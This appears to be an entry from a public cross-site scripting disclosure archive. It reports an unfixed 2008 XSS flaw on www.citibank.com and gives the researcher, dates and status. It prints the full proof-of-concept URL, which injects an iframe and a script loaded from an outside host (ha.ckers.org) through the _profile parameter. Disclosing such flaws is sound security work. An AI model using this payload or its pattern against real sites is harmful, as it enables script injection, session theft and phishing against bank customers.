Security researcher mox, has submitted on 01/04/2008 a cross-site-scripting (XSS) vulnerability affecting www.citibank.com, which at the time of submission ranked 1892 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/04/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/04/2008 |
Date published: 03/04/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: mox |
Domain: www.citibank.com |
Category: XSS |
Pagerank: 1892 |
URL: http://www.citibank.com/domain/contact/index.htm?_u=visitor&_uid=&_profile="/><iframe src=http://google.com></iframe><script src=http://ha.ckers.org/xss.js?/>&_products=NNNNNNNNNNNNNNNNN&_ll=&_mid=&_dta=&_m=0&_cn=&_j=&_jconte xt=/US&_jfp=false&BVE=https://web.da-us.citibank.com&BVP=/cgi-bin/citifi/scripts/&BV_UseBVCookie=yes |
Click here to view the mirror
|
|
|